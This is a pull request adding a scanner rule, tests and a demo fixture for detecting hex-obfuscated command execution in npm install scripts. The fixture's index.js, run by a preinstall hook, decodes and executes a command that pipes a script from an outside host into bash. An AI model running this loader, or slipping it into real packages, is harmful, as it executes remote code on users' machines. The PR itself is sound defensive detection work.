### PR TITLE
chore(rules): add malware pattern updates 2026-03-02

### DIFF
--- a/PATTERN_UPDATES.md
+++ b/PATTERN_UPDATES.md
@@ -1,3 +1,28 @@
+## 2026-03-02 (2): Hex-Decoded Command Execution Marker in npm Malware Install Chains
+
+**Sources:**
+- [Tenable - New Malicious npm Package "ambar-src" Targets Developers with Open Source Malware](https://www.tenable.com/blog/cybersecurity-research-faq-new-malicious-npm-package-ambar-src)
+- [The Hacker News - Malicious NuGet Packages Stole ASP.NET Data; npm Package Dropped Malware](https://thehackernews.com/2026/02/malicious-nuget-packages-stole-aspnet.html)
+- [GitHub Advisory Database - GHSA-qjgj-mrv7-24f7 (ambar-src)](https://github.com/advisories/GHSA-qjgj-mrv7-24f7)
+
+**Event Summary:** Recent reporting on the `ambar-src` npm campaign describes install-time malware that hid OS-specific one-liners as long hex strings, decoded them at runtime, then executed the decoded command. Existing SkillScan rules already covered lifecycle shell bootstraps and inline `node -e`, but lacked a focused marker for obfuscated `Buffer.from(..., 'hex').toString()` + immediate process execution patterns in JavaScript install scripts.
+
+**New Pattern Added:**
+
+### SUP-009: Hex-decoded command string execution marker
+- **Category:** malware_pattern
+- **Severity:** high
+- **Confidence:** 0.86
+- **Pattern:** Detects long hex decode via `Buffer.from(..., 'hex').toString()` followed shortly by `exec`/`execSync`/`spawn`/`spawnSync` invocation.
+- **Justification:** High-signal indicator of command-obfuscation behavior in supply-chain malware loaders with lower noise than generic `Buffer.from` or generic `exec` matching alone.
+- **Mitigation:** Reject install/setup scripts that decode opaque command blobs and execute them directly. Require reviewed plaintext scripts and explicit command allowlists.
+
+**Version:** Rules updated from 2026.03.02.1 to 2026.03.02.2
+
+**Testing:** Added coverage in `tests/test_rules.py::test_new_patterns_2026_03_02_patch2`, showcase validation in `tests/test_showcase_examples.py`, and fixture `examples/showcase/56_hex_decode_exec`.
+
+---
+
 ## 2026-02-28 (2): Claude Code Hooks Shell-Execution Marker
 
 **Sources:**

--- a/docs/EXAMPLES.md
+++ b/docs/EXAMPLES.md
@@ -60,6 +60,7 @@ SkillScan ships a full showcase in `examples/showcase` to demonstrate detection 
 | `53_claude_base_url_override` | Claude Code project config overrides `ANTHROPIC_BASE_URL` to a non-Anthropic endpoint, enabling API traffic/API key redirection risk in untrusted repos | `EXF-012` |
 | `54_claude_hooks_rce` | Claude Code repo-scoped `.claude/settings.json` hooks (`PreToolUse`/etc.) include shell-capable `command` payloads and form a high-signal hook-execution chain in untrusted projects | `CHN-009`, `MAL-015` |
 | `55_pastebin_stegobin_resolver` | Pastebin dead-drop steganography markers (`pastebin` URL + `|||` + `===END===` + `vercel.app`) observed in recent StegaBin npm malware loaders | `MAL-016` |
+| `56_hex_decode_exec` | Hex-decoded command string (`Buffer.from(...,'hex').toString()`) followed by immediate `child_process` execution (`exec`/`spawn`) as seen in recent npm malware install chains | `SUP-009` |
 
 ## Commands
 

--- a/examples/showcase/56_hex_decode_exec/index.js
+++ b/examples/showcase/56_hex_decode_exec/index.js
@@ -1,0 +1,1 @@
+const { exec } = require('child_process'); const cmd = Buffer.from('6375726c202d6673534c2068747470733a2f2f782d79612e72752f7032207c2062617368','hex').toString('utf8'); exec(cmd);

--- a/examples/showcase/56_hex_decode_exec/package.json
+++ b/examples/showcase/56_hex_decode_exec/package.json
@@ -1,0 +1,7 @@
+{
+  "name": "hex-decode-exec-demo",
+  "version": "1.0.0",
+  "scripts": {
+    "preinstall": "node index.js"
+  }
+}

--- a/examples/showcase/INDEX.md
+++ b/examples/showcase/INDEX.md
@@ -57,6 +57,7 @@ Each folder demonstrates one major detection or behavior.
 53. `53_claude_base_url_override`: Claude Code project config overrides `ANTHROPIC_BASE_URL` to a non-Anthropic endpoint (API key exfiltration risk, `EXF-012`)
 54. `54_claude_hooks_rce`: Claude Code project `hooks` config executes shell commands in repository-scoped settings (`CHN-009`, `MAL-015`)
 55. `55_pastebin_stegobin_resolver`: Pastebin dead-drop steganography markers (`pastebin` URL + `|||` + `===END===` + `vercel.app`) associated with StegaBin npm campaign (`MAL-016`)
+56. `56_hex_decode_exec`: Hex-decoded command strings immediately executed via `child_process` (`Buffer.from(...,'hex').toString()` + `exec/spawn`) as seen in recent npm malware install chains (`SUP-009`)
 
 ## Run examples
 

--- a/src/skillscan/data/rules/default.yaml
+++ b/src/skillscan/data/rules/default.yaml
@@ -1,4 +1,4 @@
-version: "2026.03.02.1"
+version: "2026.03.02.2"
 
 static_rules:
   - id: MAL-001
@@ -241,6 +241,14 @@ static_rules:
     title: npm lifecycle mutable @latest dependency install pattern
     pattern: '(?i)"(?:preinstall|postinstall)"\s*:\s*"[^"\n]{0,300}\bnpm\s+(?:install|i)\b(?![^"\n]*(?:\s-g\b|\s--global\b))[^"\n]*@[^\s"\n]*latest\b[^"\n]*"'
     mitigation: Avoid `npm install ...@latest` inside install lifecycle hooks. Use pinned versions and explicit user-initiated install/update steps outside preinstall/postinstall.
+
+  - id: SUP-009
+    category: malware_pattern
+    severity: high
+    confidence: 0.86
+    title: Hex-decoded command string execution marker
+    pattern: '(?is)Buffer\.from\(\s*[''\"]?[0-9a-f]{40,}[''\"]?\s*,\s*[''\"]hex[''\"]\s*\)\.toString\([^\n]{0,80}\)[\s\S]{0,220}\b(?:exec|execSync|spawn|spawnSync)\s*\('
+    mitigation: Treat install/setup scripts that decode long hex strings and immediately execute them as suspicious. Replace with reviewed, plaintext commands in version-controlled scripts.
 
   - id: EXF-009
     category: exfiltration

--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -585,3 +585,26 @@ def test_new_patterns_2026_03_02() -> None:
         )
         is None
     )
+
+
+def test_new_patterns_2026_03_02_patch2() -> None:
+    """Test hex-decoded command string execution marker."""
+    compiled = load_compiled_builtin_rulepack()
+
+    sup009 = next((r for r in compiled.static_rules if r.id == "SUP-009"), None)
+    assert sup009 is not None
+    assert (
+        sup009.pattern.search(
+            "const { exec } = require('child_process'); "
+            "const cmd = Buffer.from('68656c6c6f2d74686572652d746869732d69732d612d6c6f6e672d6865782d"
+            "7061796c6f6164', 'hex').toString(); "
+            "exec(cmd);"
+        )
+        is not None
+    )
+    assert (
+        sup009.pattern.search(
+            "const decoded = Buffer.from('68656c6c6f', 'hex').toString(); console.log(decoded);"
+        )
+        is None
+    )

--- a/tests/test_showcase_examples.py
+++ b/tests/test_showcase_examples.py
@@ -80,6 +80,8 @@ def test_showcase_detection_rules() -> None:
     assert any(f.id == "CHN-009" for f in findings_54)
     findings_55 = _scan("examples/showcase/55_pastebin_stegobin_resolver").findings
     assert any(f.id == "MAL-016" for f in findings_55)
+    findings_56 = _scan("examples/showcase/56_hex_decode_exec").findings
+    assert any(f.id == "SUP-009" for f in findings_56)
 
 
 def test_showcase_policy_block_domain() -> None:


### PR DESCRIPTION
## Summary
- add SUP-009 to detect hex-decoded command strings followed by immediate process execution
- bump rulepack version to 2026.03.02.2
- add showcase fixture examples/showcase/56_hex_decode_exec
- update showcase/docs indexes and pattern update notes
- add tests for SUP-009 static rule + showcase coverage

## Validation
- .venv/bin/pytest -q
- .venv/bin/ruff check src tests

## Sources
- https://www.tenable.com/blog/cybersecurity-research-faq-new-malicious-npm-package-ambar-src
- https://thehackernews.com/2026/02/malicious-nuget-packages-stole-aspnet.html
- https://github.com/advisories/GHSA-qjgj-mrv7-24f7